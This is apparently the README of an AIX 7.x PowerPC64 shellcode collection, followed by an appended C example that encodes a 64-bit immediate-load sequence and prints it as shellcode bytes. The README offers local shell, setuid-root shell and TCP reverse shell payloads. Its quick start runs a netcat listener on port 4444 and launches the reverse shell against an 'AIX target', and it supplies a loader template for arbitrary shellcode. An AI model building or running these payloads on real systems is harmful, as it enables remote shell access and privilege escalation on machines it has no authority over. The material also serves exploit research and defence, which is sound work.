AIX 7.x ppc64 Shellcoding
=========================

Loading a 64-bit immediate into r9 on PPC64, 16 bits at a time:

    lis    r9, hw1          # Bits 48-63
    ori    r9, r9, hw2      # Bits 32-47
    rldicr r9, r9, 32, 31   # Shift left 32 bits
    oris   r9, r9, hw3      # Bits 16-31
    ori    r9, r9, hw4      # Bits 0-15

----------------------------------------------------------------------------------------------

This research and all associated code, shellcode, and documentation are provided strictly for educational and security research purposes. The material is intended to help security professionals, researchers, and system administrators better understand the internals of AIX 7.x on PowerPC64 architecture, improve defensive techniques, and advance the field of platform-specific exploit mitigation.

Usage Restrictions: This content may not be used for unauthorized access, intrusion, or any malicious purposes. Any misuse of this research is strictly prohibited and is the sole responsibility of the user. The author does not condone or encourage any illegal activity.

AIX PowerPC64 Shellcode Collection
====================================

Tested on:
- AIX 7.3 TL4 SP0 (7300-04-00-2546)
- AIX 7.2 TL5 SP10 (7200-05-10-2520)
- AIX 7.2 TL3 SP6 (7200-03-06-2038)

Important note
--------------
AIX 7.x PPC64 shellcode works only on other systems with exactly the same Technology Level (TL) and Service Pack (SP). So a /bin/sh shellcode generated on 7300-04-00-2546 will not work on a system with 7200-05-10-2520, and vice versa. Shellcode works reliably only on systems matching the same TL/SP, so keep this in mind.

AVAILABLE SHELLCODE
-------------------
1. Local Shell (104 bytes)
   File: shellcode_local_shell.c
   Spawns /bin/sh locally

2. Setuid Shell (160 bytes)
   File: shellcode_setuid_shell.c
   Calls setuid(0) then spawns shell

3. Reverse Shell (~368 bytes)
   File: shellcode_reverse_shell.c
   TCP reverse shell with command-line IP/port

QUICK START
-----------
Build everything:
    make

Run local shell:
    ./shellcode_local_shell

Run reverse shell:
    nc -lvnp 4444                                 # On listener machine
    ./shellcode_reverse_shell 192.168.1.100 4444  # On AIX target

SHELLCODE_TEMPLATE
------------------
Use the template to build your own shellcode loader:
1. Edit shellcode_template.c and paste your shellcode bytes into the array.
2. Compile:
    gcc -maix64 -Wall -Wextra -O2 -o test shellcode_template.c

COMPILATION
-----------
All programs compile with:
    gcc -maix64 -o <output> <source.c>

Example:
    gcc -maix64 -o my_shell shellcode_local_shell.c

OUTPUT FORMAT
-------------
All shellcode programs generate two formats:

1. Hex dump:
    0000: 7c 08 02 a6 f8 01 00 10 ...

2. C array (ready to use):
    unsigned char shellcode[] =
        "\x7c\x08\x02\xa6"
        "\xf8\x01\x00\x10"
        ...
    ;
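Added example, not part of this collection: it encodes the lis/ori/rldicr/oris/ori sequence from the banner into PPC64 machine words for a constructed 64-bit value, checks the result with a tiny interpreter of those five instruction forms, and prints the bytes in the hex-dump and C-array formats described above. It assumes register r9 (as in the banner) and big-endian instruction words, as on AIX.

```c
#include <stdint.h>
#include <stdio.h>

#define REG 9u   /* target register, as in the banner sequence */

/* Encode the five-instruction load of a 64-bit immediate into r9. */
void encode_load_r9(uint64_t value, uint32_t insn[5]) {
    uint32_t hw1 = (uint32_t)(value >> 48) & 0xffffu;   /* bits 48-63 */
    uint32_t hw2 = (uint32_t)(value >> 32) & 0xffffu;   /* bits 32-47 */
    uint32_t hw3 = (uint32_t)(value >> 16) & 0xffffu;   /* bits 16-31 */
    uint32_t hw4 = (uint32_t)value & 0xffffu;           /* bits 0-15  */
    insn[0] = (15u << 26) | (REG << 21) | hw1;               /* lis  r9, hw1     */
    insn[1] = (24u << 26) | (REG << 21) | (REG << 16) | hw2; /* ori  r9, r9, hw2 */
    /* rldicr r9, r9, 32, 31 (MD-form): sh=32 -> sh[0:4]=0, sh[5]=1; me=31 -> 0x3e; XO=1 */
    insn[2] = (30u << 26) | (REG << 21) | (REG << 16) | (0x3eu << 5) | (1u << 2) | (1u << 1);
    insn[3] = (25u << 26) | (REG << 21) | (REG << 16) | hw3; /* oris r9, r9, hw3 */
    insn[4] = (24u << 26) | (REG << 21) | (REG << 16) | hw4; /* ori  r9, r9, hw4 */
}

/* Interpreter for exactly these five instruction forms: returns the r9 they produce. */
uint64_t run_load_r9(const uint32_t insn[5]) {
    uint64_t r9 = (uint64_t)(int64_t)(int32_t)((insn[0] & 0xffffu) << 16); /* lis sign-extends */
    r9 |= insn[1] & 0xffffu;                                    /* ori  */
    r9 = (r9 << 32) & 0xFFFFFFFF00000000ULL;                    /* rldicr ..., 32, 31 */
    r9 |= (uint64_t)(insn[3] & 0xffffu) << 16;                  /* oris */
    r9 |= insn[4] & 0xffffu;                                    /* ori  */
    return r9;
}

/* Encode then execute, so a caller can confirm the sequence round-trips a value. */
uint64_t roundtrip(uint64_t value) { uint32_t i[5]; encode_load_r9(value, i); return run_load_r9(i); }

/* Serialize instruction words as big-endian bytes (AIX byte order); returns byte count. */
size_t to_bytes(const uint32_t *insn, size_t n, unsigned char *out) {
    for (size_t i = 0; i < n; i++)
        for (int b = 0; b < 4; b++) out[4 * i + b] = (unsigned char)(insn[i] >> (24 - 8 * b));
    return 4 * n;
}

int main(void) {
    uint32_t insn[5]; unsigned char buf[20];
    encode_load_r9(0x1122334455667788ULL, insn);          /* constructed sample value */
    size_t n = to_bytes(insn, 5, buf);
    printf("0000:");                                       /* hex dump format */
    for (size_t i = 0; i < n; i++) printf(" %02x", buf[i]);
    printf("\nunsigned char shellcode[] =\n");             /* C array format */
    for (size_t i = 0; i < n; i += 4)
        printf("    \"\\x%02x\\x%02x\\x%02x\\x%02x\"\n", buf[i], buf[i + 1], buf[i + 2], buf[i + 3]);
    printf(";\nr9 = 0x%016llx\n", (unsigned long long)run_load_r9(insn));
    return 0;
}
```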